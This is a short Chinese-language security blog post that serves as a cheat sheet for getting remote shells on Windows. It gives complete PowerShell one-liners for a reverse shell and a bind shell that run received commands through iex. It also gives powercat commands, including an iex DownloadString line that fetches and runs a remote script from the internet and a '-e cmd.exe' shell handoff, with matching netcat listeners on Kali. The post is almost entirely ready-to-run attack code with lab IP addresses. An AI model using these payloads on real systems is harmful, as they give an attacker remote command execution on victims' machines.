【信息安全】反弹shell

1、windows-powershell反弹shell

kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali

  • windows端
$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • kali端
nv -lvnp 4444

2、windows – powershell 绑定shell

windows作为服务端,将shell与监听端口做绑定,kali作为客户端去连

  • windows端
$listener = New-Object System.Net.Sockets.TcpListener('192.168.57.1',4444);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
  • kali端
nc -nv 192.168.57.1 4444

3 使用powercat反弹shell

powercat需要单独下载,windows未内置,kali可直接使用sudo apt install powercat安装

  • windows安装powercat
# `此方法仅对当前终端有效,且需要主机可以连接公网`
iex (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1")

# 反弹shell给kali,此时kali需要作为服务端监听
powercat -c 192.168.57.200 -p 4444 -e cmd.exe
# windows作为服务器,将shell绑定到监听的端口
powercat -l 192.168.57.1 -p 4444 -e cmd.exe
  • kali
# kali启动监听,windows端主动去连接
nc -lnvp 4444
# kali作为客户端去连接windows服务端
nc -nv 192.168.57.1 4444
上一篇:内网渗透之反弹shell


下一篇:内网渗透之——内网转发